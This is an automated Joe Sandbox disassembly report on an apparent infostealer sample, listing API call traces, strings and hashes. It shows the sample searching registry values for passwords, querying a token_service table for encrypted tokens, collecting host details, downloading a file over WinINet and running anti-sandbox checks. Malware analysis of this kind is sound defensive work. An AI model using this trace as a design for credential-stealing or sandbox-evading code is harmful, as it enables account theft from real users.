Part of subcall function 00406CA0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
Part of subcall function 00406CA0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
Part of subcall function 00406CA0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
Part of subcall function 00406CA0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
Part of subcall function 00406CA0: HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

lstrcat.KERNEL32(30AB4020,0041DEB8), ref: 00406FD6
lstrcat.KERNEL32(30AB4020,00000000), ref: 00407018
lstrcat.KERNEL32(30AB4020, : ), ref: 0040702A
lstrcat.KERNEL32(30AB4020,00000000), ref: 0040705F
lstrcat.KERNEL32(30AB4020,0041DEC0), ref: 00407070
lstrcat.KERNEL32(30AB4020,00000000), ref: 004070A3
lstrcat.KERNEL32(30AB4020,0041DEC4), ref: 004070BD
task.LIBCPMTD ref: 004070CB

Strings

: , xrefs: 0040701E
h0A, xrefs: 00406FA6, 00406FA9
`v@, xrefs: 00406FAF, 004070C8, 00406FFE, 00407034, 0040707C, 00407045, 00406FB2

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: : $`v@$h0A
API String ID: 3191641157-3559972273
Opcode ID: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
Instruction ID: d9fe8ddf8edd41d5d79e2c2aa3549d60ad86c8a123fe42dd1537da3b5299582f
Opcode Fuzzy Hash: 90ba860eb88153124b5ff0dd3d9899c95f8f381682475dbda3cd4adffff03995
Instruction Fuzzy Hash: 4B318371E05504ABCB14EBA0DD99EFF7B75BF44305B104519F102BB290DA38BD46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00415710 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

image/jpeg, xrefs: 00415836

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID:
String ID: image/jpeg
API String ID: 0-3785015651
Opcode ID: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
Instruction ID: 4e1e11a2c406ea1305e74ab4ef0d66e5904d243d4ada77d8c1e4b1ca7303bf9d
Opcode Fuzzy Hash: 9a9d15ccce1688aa5f0ddc31980a02235787a91170649dd34c88eef5399de2d3
Instruction Fuzzy Hash: 30714CB5910608EBDB14EFE4EC85FEEB7B9BF48300F108509F515A7290DB38A945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

C, xrefs: 004141E9
:, xrefs: 004141F9
\, xrefs: 004141FD

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 00409426, 00409449, 00409429, 0040946F
'@, xrefs: 004093C3, 00409486

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 8b55da906079f4b7e2c67570a1be054e10abea7064ba0d58136f1bac8616076b
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04147A98,00000000,?,0041D774,00000000,?,00000000,00000000,?,041479F0), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

%d MB, xrefs: 004149E0
@, xrefs: 0041498A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,041434C0), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 33d80e034ad8f542e0ef5a467f467662f582e0545ae4ff6488c0ef396ccf234c
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountTokens, xrefs: 0040B319
AccountId, xrefs: 0040B472
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B28A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: 7d4500fa2934594752666061c9df31e8c65c16c470467cd37b1ac9dbbd13c62c
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,04147A20,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,04147BA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,04148278,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,04148AF0,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,04148AC0), ref: 00411E2B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142FB8), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04143030), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04143048), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142F88), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04143060), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,041431C0), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04127100), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,041270C0), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142E98), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142EB0), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142E38), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04142FA0), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04127260), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,04143078), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04143330,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,041431B0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,041431B0,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

